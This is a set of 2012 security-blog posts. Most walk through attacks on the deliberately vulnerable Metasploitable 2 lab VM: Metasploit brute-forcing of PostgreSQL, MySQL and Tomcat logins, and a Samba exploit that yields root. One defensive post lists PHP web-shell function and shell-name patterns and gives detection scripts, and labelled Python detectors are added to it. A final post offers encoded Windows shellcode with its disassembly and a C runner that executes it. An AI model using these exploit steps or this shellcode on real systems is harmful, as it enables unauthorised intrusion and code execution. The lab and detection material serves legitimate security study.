Attacking PostgreSQL On Metasploitable 2

18 June 2012

In this article we will see how to attack a system that runs a PostgreSQL database.

Let's say that we have performed a port scan on a server and identified that it is running PostgreSQL on port 5432.

Scanning with nmap:

nmap -sV 192.168.235.129

We will open the Metasploit Framework and search for "postgresql":

msf > search postgresql

Matching Modules
================

Name                                         Disclosure Date  Rank       Description
----                                         ---------------  ----       -----------
auxiliary/admin/postgres/postgres_readfile                    normal     PostgreSQL Server Generic Query
auxiliary/admin/postgres/postgres_sql                         normal     PostgreSQL Server Generic Query
auxiliary/scanner/postgres/postgres_login                     normal     PostgreSQL Login Utility
auxiliary/scanner/postgres/postgres_version                   normal     PostgreSQL Version Probe
exploit/windows/postgres/postgres_payload    2009-04-10       excellent  PostgreSQL for Microsoft Windows Payload Execution

We will use the postgres_login scanner.

Usage Information:

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(postgres_login) > run

Set the target address range:

msf>set RHOSTS 192.168.235.129

and

msf  auxiliary(postgres_login) > exploit

[*] 192.168.235.129:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'
[-] 192.168.235.129:5432 Postgres - Invalid username or password: 'postgres':''
[-] 192.168.235.129:5432 Postgres - [01/21] - Username/Password failed.
[*] 192.168.235.129:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'
[-] 192.168.235.129:5432 Postgres - Invalid username or password: '':''
[-] 192.168.235.129:5432 Postgres - [02/21] - Username/Password failed.
[*] 192.168.235.129:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'
[-] 192.168.235.129:5432 Postgres - Invalid username or password: 'scott':''
[-] 192.168.235.129:5432 Postgres - [03/21] - Username/Password failed.
[*] 192.168.235.129:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'

...

This scanner is already configured to use the Metasploit Framework's default PostgreSQL wordlists, so we use them in this case:

USERPASS_FILE  C:/Program Files/Rapid7/framework/msf3/data/wordlists/postgres_default_userpass.txt  no  File containing (space-separated) users and passwords, one pair per line
USER_FILE      C:/Program Files/Rapid7/framework/msf3/data/wordlists/postgres_default_user.txt      no  File containing users, one per line

Waiting, waiting, and then success.

We have the user name "postgres" and the password "postgres".

Now we can log in as the postgres user.

Sources:

1. Metasploit Unleashed - http://www.offensive-security.com/metasploit-unleashed/Admin_Postgres_Modules

2. PostgreSQL Login Utility - http://www.metasploit.com/modules/auxiliary/scanner/postgres/postgres_login

How to find backdoor PHP shell scripts on a server

17 June 2012

When hackers get access to your website server, they sometimes install a backdoor shell script designed to allow them to regain entry even after you’ve cleaned up the site, repaired the original security hole that allowed the hack to occur, otherwise improved site security, and even installed measures to try to lock the hackers out.

A backdoor script can be called from a browser like any other web page. It gives its user a web page interface where they can download and upload, view or modify files, create directories, and otherwise manage the site using PHP’s ability to read and write files and pass operating system commands through to the operating system.

One way to find these scripts is by searching website access logs for the suspicious lines that can be generated when someone uses the scripts to modify site files.

Backdoor scripts often need PHP functions that most legitimate scripts don't, so you can search the files in your site for those functions. Any text-search utility will do; the strings to look for are:

  • passthru
  • shell_exec
  • system
  • phpinfo
  • base64_decode
  • edoced_46esab
  • chmod
  • mkdir
  • ` (backticks with an operating system command between them)
  • fopen
  • fclose
  • readfile

On a Linux server, the grep program is already installed as part of the operating system. The only problem is figuring out how to launch it.

If you have command line access to your server (SSH), there’s no problem. You can run it from the command line and have the results displayed to you.

Sample text searches for suspicious PHP code.

Do the search once for each of the suggested PHP keywords listed above.

grep -Rn "mkdir *(" public_html/

Or

grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" public_html/

Or we can use the following script (source):

#!/usr/bin/perl -w
# usage: ./findshell.pl <sensitivity 1-50> <directory to scan>
use strict;
use File::Find;

my $sens   = shift || 10;    # minimum score that gets reported
my $folder = shift || './';  # directory tree to walk
find(\&backdoor, $folder);

sub backdoor {
    # File::Find sets $_ to the file name and chdirs into its directory
    if ((/\.(php|txt)/)) {
        open(my $IN, '<', $_) || die "can not open file $File::Find::name: $!";
        my @file = <$IN>;
        close $IN;
        # maybe evil stuff: one point per line that uses a suspicious function
        my $score = grep(/function_exists\(|phpinfo\(|safe_?mode|shell_exec\(|popen\(|passthru\(|system\(|myshellexec\(|exec\(|getpwuid\(|getgrgid\(|fileperms\(/i, @file);
        # probably evil stuff: request input reaching eval/system, eval of base64, known shell names
        my $tempscore = grep(/\`\$\_(post|request|get).{0,20}\`|(include|require|eval|system|passthru|shell_exec).{0,10}\$\_(post|request|get)|eval.{0,10}base64_decode|back_connect|backdoor|r57|PHPJackal|PhpSpy|GiX|Fx29SheLL|w4ck1ng|milw0rm|PhpShell|k1r4|FeeLCoMz|FaTaLisTiCz|Ve_cENxShell|UnixOn|C99madShell|Spamfordz|Locus7s|c100|c99|x2300|cgitelnet|webadmin|cybershell|STUNSHELL|Pr!v8|PHPShell|KaMeLeOn|S4T|oRb|tryag|sniper|noexecshell|\/etc\/passwd|revengans/i, @file);
        $score += 50 * $tempscore;
        print "$score - Possible backdoor : $File::Find::name\n" if ($score > $sens - 1);
    }
    elsif ((/\.(jpg|jpeg|gif|png|tar|zip|gz|rar|pdf)/)) {
        # PHP code has no business inside an image or archive
        open(my $IN, '<', $_) || (print "can not open file $File::Find::name: $!\n" and return);
        print "5000 - Possible backdoor (php in non-php file): $File::Find::name\n" if grep /(\<\?php|include(\ |\())/i, <$IN>;
        close $IN;
    }
}
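As an added example that is not part of the original post or of the findshell.pl script above, here is a Python scorer built on the same idea as the grep one-liner and the Perl script. It adds two things the one-liner cannot express: PHP function names are case-insensitive (so `SYSTEM(` or `Eval(` is matched), and two items from the list above that the one-liner omits, the reversed-name trick (`'edoced_46esab'`) and the backtick operator, are scored too. The weights, the sample PHP snippets and the directory walker are my own assumptions, not the post's.

```python
import os
import re

# Function names from the post's list plus exec, popen and eval, which the Perl
# script also flags. PHP function names are case-insensitive, so every pattern
# is compiled with re.IGNORECASE (the grep one-liner in the post is not).
SUSPICIOUS_FUNCS = [
    "passthru", "shell_exec", "system", "phpinfo", "base64_decode", "chmod",
    "mkdir", "fopen", "fclose", "readfile", "exec", "popen", "eval",
]
# Extensions treated as PHP source; everything else is only checked for a PHP tag.
PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".inc", ".txt"}

FUNC_CALL = re.compile(r"\b(" + "|".join(SUSPICIOUS_FUNCS) + r")\s*\(", re.I)
# Reversed names only count inside a string literal, e.g. strrev('edoced_46esab')
REVERSED = re.compile(r"['\"](" + "|".join(re.escape(f[::-1]) for f in SUSPICIOUS_FUNCS) + r")['\"]", re.I)
BACKTICK = re.compile(r"`[^`\n]{1,200}`")  # PHP backtick operator runs a shell command
INPUT_TO_EXEC = re.compile(
    r"\b(eval|system|passthru|shell_exec|exec|popen|include|require|assert)"
    r"\s*\(.{0,40}\$_(GET|POST|REQUEST|COOKIE)\b", re.I)
EVAL_B64 = re.compile(r"\beval\s*\(.{0,20}base64_decode\s*\(", re.I)
PHP_TAG = re.compile(r"<\?php\b|<\?=", re.I)

# (rule name, weight, pattern); the weights are an assumption modelled on the
# Perl script's 1 point for "maybe evil" and 50 for "probably evil".
RULES = [
    ("suspicious call", 1, FUNC_CALL),
    ("reversed function name", 50, REVERSED),
    ("backtick shell command", 10, BACKTICK),
    ("request input reaches exec/eval", 50, INPUT_TO_EXEC),
    ("eval of base64 payload", 50, EVAL_B64),
]


def score_php_source(text):
    """Return (score, findings) for PHP source; a finding is (rule, weight, matched text)."""
    findings = []
    for name, weight, pattern in RULES:
        for m in pattern.finditer(text):
            findings.append((name, weight, m.group(0)))
    return sum(w for _, w, _ in findings), findings


def score_file_contents(name, data):
    """Score raw bytes by file name: PHP-like files get the source rules; any other
    file is flagged only if it carries a PHP open tag, which no image should."""
    text = data.decode("utf-8", errors="ignore")
    if os.path.splitext(name)[1].lower() in PHP_EXTENSIONS:
        return score_php_source(text)
    m = PHP_TAG.search(text)
    if m:
        return 5000, [("php tag in non-php file", 5000, m.group(0))]
    return 0, []


def scan_tree(root, sensitivity=10):
    """Walk a directory tree; yield (score, path, findings) for files scoring >= sensitivity."""
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError as exc:
                print(f"cannot open {path}: {exc}")
                continue
            score, findings = score_file_contents(fn, data)
            if score >= sensitivity:
                yield score, path, findings


# Constructed samples (not from the post) for a quick self-check.
BENIGN_PHP = """<?php
// ordinary upload handler: listed functions used for normal work
if (!is_dir($dir)) { mkdir($dir, 0755); }
$h = fopen($dir . '/log.txt', 'a');
fwrite($h, "uploaded");
fclose($h);
"""
BACKDOOR_PHP = "<?php $f = strrev('edoced_46esab'); eval($f($_POST['x'])); ?>"
IMAGE_WITH_PHP = b"\xff\xd8\xff\xe0JFIF" + b"<?php echo 'x'; ?>"

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_PHP), ("backdoor", BACKDOOR_PHP)):
        score, findings = score_php_source(sample)
        print(label, score, [f[0] for f in findings])
    print("logo.jpg", score_file_contents("logo.jpg", IMAGE_WITH_PHP)[0])
```

Run it as `python3 findshell.py` for the self-check, or call `scan_tree("public_html", sensitivity=10)` from a small wrapper to walk a site. A legitimate file that opens or writes files scores a few points; a score of 50 or more comes only from the patterns that almost never appear in normal code, which is what makes the sensitivity threshold usable.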

Source: Web Shell Detection Using NeoPI

Categories: BackDoor

Metasploitable 2 - Apache Tomcat Exploitation

16 June 2012

In this post we will focus on the Apache Tomcat web server and how we can discover the administrator's credentials in order to gain access to the remote system, Metasploitable 2.

So we are performing our internal penetration test and we have discovered Apache Tomcat running on a remote system (Metasploitable Linux 2) on port 8180.

Our next step is to start the Metasploit Framework and search for "tomcat":

msf> search tomcat

We have found an auxiliary scanner which will be the tool for our attempt to log in to the Tomcat Application Manager.

So we run the scanner and wait to see if it discovers any valid credentials.

We see user "tomcat", password "tomcat".

Categories: Metasploit

Metasploitable 2 - Bruteforce MySQL Using Metasploit

15 June 2012

I will demonstrate how to brute force MySQL logins using Metasploit. This is again another attack against the Metasploitable 2 distribution I mentioned in my previous post.

This is very simple:

c:\Program Files\Rapid7\framework\msfconsole.bat

Type :

msf>db_connect bt:my_pass@localhost:5432/msf3

msf>services

We see that MySQL is running:

192.168.235.129  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5

Search for an exploit:

msf>search mysql

Choose:

msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

Run exploit:

msf auxiliary(mysql_login) > exploit

[*] 192.168.235.129:3306 - Found remote MySQL version 5.0.51a
[*] 192.168.235.129:3306 Trying username:'admin' with password:''
[*] 192.168.235.129:3306 failed to login as 'admin' with password ''
[*] 192.168.235.129:3306 Trying username:'god' with password:''
[*] 192.168.235.129:3306 failed to login as 'god' with password ''

...........................................

The list is long

...........................................

[*] 192.168.235.129:3306 Trying username:'root' with password:''
[+] 192.168.235.129:3306 - SUCCESSFUL LOGIN 'root' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

User "root", no password. We can connect with the MySQL client:

mysql -h 192.168.235.129 -u root
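The PostgreSQL and MySQL login scanners on this page leave the same footprint on the database server: a burst of failed logins from one source, often followed by a single success once the default credential is reached. As an added example that is not from the original posts, here is a Python detector for that pattern over database log lines. The log lines are constructed samples: the PostgreSQL lines assume `log_line_prefix = '%t [%p] %h '` with `log_connections = on`, the MySQL lines assume the 5.x error-log "Access denied" warnings written with `log_warnings = 2`; the threshold and window are my own choices.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines (not from the original posts). PostgreSQL lines assume
# log_line_prefix = '%t [%p] %h ' and log_connections = on; MySQL lines assume the
# 5.x error-log format with log_warnings = 2 so that "Access denied" is written.
SAMPLE_LOG = """\
2012-06-18 21:05:01 UTC [4411] 192.168.235.130 FATAL:  password authentication failed for user "postgres"
2012-06-18 21:05:01 UTC [4412] 192.168.235.130 FATAL:  password authentication failed for user "scott"
2012-06-18 21:05:02 UTC [4413] 192.168.235.130 FATAL:  password authentication failed for user "admin"
2012-06-18 21:05:02 UTC [4414] 192.168.235.130 FATAL:  password authentication failed for user "postgres"
2012-06-18 21:05:03 UTC [4415] 192.168.235.130 LOG:  connection authorized: user=postgres database=template1
2012-06-18 21:30:00 UTC [4500] 192.168.235.10 LOG:  connection authorized: user=app database=shop
120618 21:07:12 [Warning] Access denied for user 'admin'@'192.168.235.130' (using password: NO)
120618 21:07:12 [Warning] Access denied for user 'god'@'192.168.235.130' (using password: NO)
120618 21:07:13 [Warning] Access denied for user 'test'@'192.168.235.130' (using password: NO)
"""

PG_PREFIX = r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) \S+ \[\d+\] (?P<ip>[\d.]+) "
PG_FAIL = re.compile(PG_PREFIX + r'FATAL:\s+password authentication failed for user "(?P<user>[^"]+)"')
PG_OK = re.compile(PG_PREFIX + r"LOG:\s+connection authorized: user=(?P<user>\S+)")
MY_FAIL = re.compile(r"^(?P<ts>\d{6} +\d{1,2}:\d\d:\d\d) \[Warning\] Access denied for user "
                     r"'(?P<user>[^']*)'@'(?P<ip>[^']+)'")


def parse_events(text):
    """Turn log text into (timestamp, service, source_ip, user, success) tuples."""
    events = []
    for line in text.splitlines():
        m = PG_FAIL.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
            events.append((ts, "postgresql", m.group("ip"), m.group("user"), False))
            continue
        m = PG_OK.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
            events.append((ts, "postgresql", m.group("ip"), m.group("user"), True))
            continue
        m = MY_FAIL.match(line)
        if m:
            # MySQL pads single-digit hours with a space; collapse it before parsing
            ts = datetime.strptime(re.sub(r"\s+", " ", m.group("ts")), "%y%m%d %H:%M:%S")
            events.append((ts, "mysql", m.group("ip"), m.group("user"), False))
    return events


def detect(events, threshold=3, window_seconds=60):
    """Flag (a) `threshold` failures from one source inside the window and
    (b) a success that follows recent failures from the same source."""
    alerts = []
    recent_fail = defaultdict(list)  # (service, ip) -> [(ts, user), ...]
    for ts, service, ip, user, ok in sorted(events):
        key = (service, ip)
        fails = [(t, u) for t, u in recent_fail[key] if (ts - t).total_seconds() <= window_seconds]
        if ok:
            if fails:
                alerts.append(("success-after-failures", service, ip, user, len(fails)))
            recent_fail[key] = []
        else:
            fails.append((ts, user))
            recent_fail[key] = fails
            if len(fails) == threshold:  # fire once, when the threshold is crossed
                alerts.append(("brute-force", service, ip, user, threshold))
    return alerts


def analyze(text, threshold=3, window_seconds=60):
    return detect(parse_events(text), threshold, window_seconds)


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The "success-after-failures" alert is the one worth paging on: it is exactly what the scanner output above looks like from the server side, and it also catches a slow scan that stays under the failure threshold. Feed it the real logs (`tail -F` into `parse_events`) and tune `threshold` and `window_seconds` to the normal failure rate of your applications.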


Categories: Metasploit

Rapid7 - Metasploitable 2

14 June 2012

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download from Sourceforge.net and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

With Metasploitable 2 running on VMware, here we go:

c:\rapid7\metasploit\msfconsole.bat

Check the version

msf > version
Framework: 4.4.0-dev.15205
Console  : 4.4.0-dev.15168
msf >

Connect to the database:

Now we should be able to enter the db_nmap command from within msfconsole to run nmap and have its results automatically stored in our new database.

msf > db_nmap -sS -A 192.168.235.129

The scan output ends with:

[*] Nmap: MAC Address: 00:0C:29:BF:08:FB (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS details: Linux 2.6.9 - 2.6.31
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux
[*] Nmap: Host script results:
[*] Nmap: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
[*] Nmap: | smb-os-discovery:
[*] Nmap: |   OS: Unix (Samba 3.0.20-Debian)
[*] Nmap: |   Name: WORKGROUP\Unknown
[*] Nmap: |_  System time: 2012-06-14 21:07:53 UTC-4
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.44 ms 192.168.235.129
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 176.79 seconds
msf >

Result:

msf > services

Services
========

host             port  proto  name         state  info
----             ----  -----  ----         -----  ----
192.168.235.129  21    tcp    ftp          open   vsftpd 2.3.4
192.168.235.129  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.235.129  23    tcp    telnet       open   Linux telnetd
192.168.235.129  25    tcp    smtp         open   Postfix smtpd
192.168.235.129  53    tcp    domain       open   ISC BIND 9.4.2
192.168.235.129  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.235.129  110   tcp    pop3-proxy   open   AVG pop3 proxy broken
192.168.235.129  111   tcp    rpcbind      open   2 rpc #100000
192.168.235.129  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
192.168.235.129  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
192.168.235.129  512   tcp    exec         open   netkit-rsh rexecd
192.168.235.129  513   tcp    login        open
192.168.235.129  514   tcp    shell        open
192.168.235.129  1099  tcp    jrmi         open   GNU Classpath grmiregistry
192.168.235.129  1524  tcp    ingreslock   open
192.168.235.129  2049  tcp    nfs          open   2-4 rpc #100003
192.168.235.129  2121  tcp    ccproxy-ftp  open
192.168.235.129  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
192.168.235.129  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
192.168.235.129  5900  tcp    vnc          open   VNC protocol 3.3
192.168.235.129  6000  tcp    x11          open   access denied
192.168.235.129  6667  tcp    irc          open   Unreal ircd
192.168.235.129  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
192.168.235.129  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1

Let’s search for a Samba exploit and try it against the system:

msf>search samba

The first shot is:

msf > use exploit/multi/samba/usermap_script

msf  exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  139              yes       The target port

Exploit target:

Id  Name
--  ----
0   Automatic

msf  exploit(usermap_script) > set RHOST 192.168.235.129
RHOST => 192.168.235.129
msf  exploit(usermap_script) > exploit

Result: I'm "super user".

id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Categories: Metasploit

Win32/7 Ultimate mspaint.exe ShellCode

8 June 2012

Author: Ayrbyte
Link: -
Version: -
Category: Win32/7 local
Tested on: Windows 7 Ultimate
Code: C++

(disassembly)

00403000   BB 449BB40E      MOV EBX,0EB49B44
00403005   33C9             XOR ECX,ECX
00403007   DBC4             FCMOVNB ST,ST(4)
00403009   B1 32            MOV CL,32
0040300B   D97424 F4        FSTENV (28-BYTE) PTR SS:[ESP-C]
0040300F   5D               POP EBP
00403010   315D 13          XOR DWORD PTR SS:[EBP+13],EBX
00403013   83C5 04          ADD EBP,4
00403016   035D 0F          ADD EBX,DWORD PTR SS:[EBP+F]
00403019  -E2 B1            LOOPD SHORT msgbox.00402FCC
0040301B   67:5C            POP ESP
0040301D   8739             XCHG DWORD PTR DS:[ECX],EDI
0040301F   98               CWDE
00403020   9D               POPFD
00403021   F8               CLC
00403022   B0 7D            MOV AL,7D
00403024   AC               LODS BYTE PTR DS:[ESI]
00403025   2AA6 F69DFAAD    SUB AH,BYTE PTR DS:[ESI+ADFA9DF6]
0040302B   5B               POP EBX
0040302C   2E:70 E3         JO SHORT msgbox.00403012
0040302F   4F               DEC EDI
00403030   A5               MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>
00403031   F4               HLT
00403032   2B7F 0E          SUB EDI,DWORD PTR DS:[EDI+E]
00403035   B2 0D            MOV DL,0D
00403037   4E               DEC ESI
00403038   8F               ???
00403039  -72 91            JB SHORT msgbox.00402FCC
0040303B   1C 53            SBB AL,53
0040303D   14 6D            ADC AL,6D
0040303F   5F               POP EDI
00403040   80F6 4C          XOR DH,4C
00403043   90               NOP
00403044   D5 F7            AAD 0F7
00403046   89CD             MOV EBP,ECX
00403048   16               PUSH SS
00403049   A5               MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>
0040304A   42               INC EDX
0040304B   99               CDQ
0040304C   855A E7          TEST DWORD PTR DS:[EDX-19],EBX
0040304F   DF15 5A275425    FIST WORD PTR DS:[2554275A]
00403055   24 42            AND AL,42
00403057   AB               STOS DWORD PTR ES:[EDI]
00403058   D29E 4DFC4B94    RCR BYTE PTR DS:[ESI+944BFC4D],CL
0040305E   05 E4E0F2B5      ADD EAX,B5F2E0E4
00403063   15 24E1895C      ADC EAX,5C89E124
00403068   41               INC ECX
00403069   D27A 5F          SAR BYTE PTR DS:[EDX+5F],CL
0040306C   832A 83          SUB DWORD PTR DS:[EDX],-7D
0040306F   51               PUSH ECX
00403070  ^EB E1            JMP SHORT msgbox.00403053
00403072   BA 5DE6F8FB      MOV EDX,FBF8E65D
00403077   5A               POP EDX
00403078   198F F798A488    SBB DWORD PTR DS:[EDI+88A498F7],ECX
0040307E   CC               INT3
0040307F   E3 72            JECXZ SHORT msgbox.004030F3
00403081   1C D0            SBB AL,0D0
00403083   44               INC ESP
00403084   F0:8630          LOCK XCHG BYTE PTR DS:[EAX],DH
00403087  ^74 D5            JE SHORT msgbox.0040305E
00403089   51               PUSH ECX
0040308A   B3 7A            MOV BL,7A
0040308C   92               XCHG EAX,EDX
0040308D   16               PUSH SS
0040308E   9B               WAIT
0040308F   9E               SAHF
00403090   25 FA909BAE      AND EAX,AE9B90FA
00403095   FD               STD
00403096   76 2A            JBE SHORT msgbox.004030C2
00403098   F4               HLT
00403099   D952 76          FST DWORD PTR DS:[EDX+76]
0040309C   AE               SCAS BYTE PTR ES:[EDI]
0040309D   40               INC EAX
0040309E   C3               RETN
0040309F   D201             ROL BYTE PTR DS:[ECX],CL
004030A1   7C 13            JL SHORT msgbox.004030B6
004030A3   BA FED85829      MOV EDX,2958D8FE
004030A8   EA 5B0324ED EE3E JMP FAR 3EEE:ED24035B
004030AF   01ED             ADD EBP,EBP
004030B1   F0:40            LOCK INC EAX
004030B3   2286 C1CBADD1    AND AL,BYTE PTR DS:[ESI+D1ADCBC1]
004030B9   DD1E             FSTP QWORD PTR DS:[ESI]
004030BB   8A2E             MOV CH,BYTE PTR DS:[ESI]
004030BD   94               XCHG EAX,ESP
004030BE   02BB A671D7F9    ADD BH,BYTE PTR DS:[EBX+F9D771A6]
004030C4   AA               STOS BYTE PTR ES:[EDI]
004030C5   8102 3DD301A6    ADD DWORD PTR DS:[EDX],A601D33D
004030CB   BE 2019C3BB      MOV ESI,BBC31920
004030D0   6D               INS DWORD PTR ES:[EDI],DX
004030D1   9D               POPFD
004030D2   38B6 FE483E65    CMP BYTE PTR DS:[ESI+653E48FE],DH
004030D8   FE               ???
004030D9   58               POP EAX
004030DA   53               PUSH EBX
004030DB   FA               CLI
004030DC   70 02            JO SHORT msgbox.004030E0
004030DE   C2 9204          RETN 492
004030E1   C400             LES EAX,FWORD PTR DS:[EAX]

Exploit:

#include <windows.h>
char string[] =
"\xbb\x44\x9b\xb4\x0e\x33\xc9\xdb\xc4\xb1\x32\xd9\x74\x24\xf4\x5d\x31\x5d\x13\x83\xc5\x04\x03\x5d\x0f\xe2\xb1\x67\x5c\x87\x39\x98\x9d\xf8\xb0\x7d\xac\x2a\xa6\xf6\x9d\xfa\xad\x5b\x2e\x70\xe3\x4f\xa5\xf4\x2b\x7f\x0e\xb2\x0d\x4e\x8f\x72\x91\x1c\x53\x14\x6d\x5f\x80\xf6\x4c\x90\xd5\xf7\x89\xcd\x16\xa5\x42\x99\x85\x5a\xe7\xdf\x15\x5a\x27\x54\x25\x24\x42\xab\xd2\x9e\x4d\xfc\x4b\x94\x05\xe4\xe0\xf2\xb5\x15\x24\xe1\x89\x5c\x41\xd2\x7a\x5f\x83\x2a\x83\x51\xeb\xe1\xba\x5d\xe6\xf8\xfb\x5a\x19\x8f\xf7\x98\xa4\x88\xcc\xe3\x72\x1c\xd0\x44\xf0\x86\x30\x74\xd5\x51\xb3\x7a\x92\x16\x9b\x9e\x25\xfa\x90\x9b\xae\xfd\x76\x2a\xf4\xd9\x52\x76\xae\x40\xc3\xd2\x01\x7c\x13\xba\xfe\xd8\x58\x29\xea\x5b\x03\x24\xed\xee\x3e\x01\xed\xf0\x40\x22\x86\xc1\xcb\xad\xd1\xdd\x1e\x8a\x2e\x94\x02\xbb\xa6\x71\xd7\xf9\xaa\x81\x02\x3d\xd3\x01\xa6\xbe\x20\x19\xc3\xbb\x6d\x9d\x38\xb6\xfe\x48\x3e\x65\xfe\x58\x53\xfa\x70\x02\xc2\x92\x04\xc4";
int main()
{
  ((void (*)(void))string)();
}
Categories: Exploit

control - windows firewall from the command line

7 June 2012

Categories: FireWall